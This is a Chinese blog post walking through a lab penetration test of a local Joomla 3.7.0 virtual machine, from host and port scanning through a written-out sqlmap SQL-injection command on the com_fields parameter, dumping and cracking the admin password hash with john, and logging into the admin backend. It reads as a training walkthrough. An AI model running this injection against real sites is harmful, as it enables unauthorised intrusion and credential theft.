渗透网站管理员后台(实战)!!

574 阅读1分钟

持续创作,加速成长!这是我参与「掘金日新计划 · 10 月更文挑战」的第21天
10月更文诚意加码,激发写作潜力|掘金·日新计划 - 掘金 (juejin.cn)点击查看活动详情

 首先使用fping -aqg 扫描靶机ip,因为实战是不会给你ip的,需要你自己来找,扫描

扫描到靶机ip为192.168.189.137,另外两个是我别的网卡

有了靶机ip,那我们就要扫描靶机服务,端口信息来进行渗透

Nmap -sV扫描靶机服务详细信息,来进行判断

这个只扫描出来80端口

我们再使用whatweb来扫描

发现这个是用joomla内容管理系统

再使用joomscan扫描,查看相关信息,版本

使用命令joomscan -url http://192.168.189.136

发现joomla的版本为3.7.0,3.7.0版本是存在漏洞的

还有一些可访问的目录

使用searchsploit joomla 3.7.0,查看内容相关文档

将该文件保存到本地

查看注入方法

对靶机使用该方法

sqlmap -u "http://192.168.189.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

扫出来5个数据库

查看敏感数据库joomladb,扫敏感列,扫id,passwd表

最终得出用户名为admin,密码为 2y2y10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

密码是hash,我们需要解密

将密码写入hash文档,用john解密

得到密码为snoopy

使用dirb扫描目录,登录页面

发现有一个administrator

访问一下

尝试使用刚刚的账号密码登录

成功拿下网站管理员后台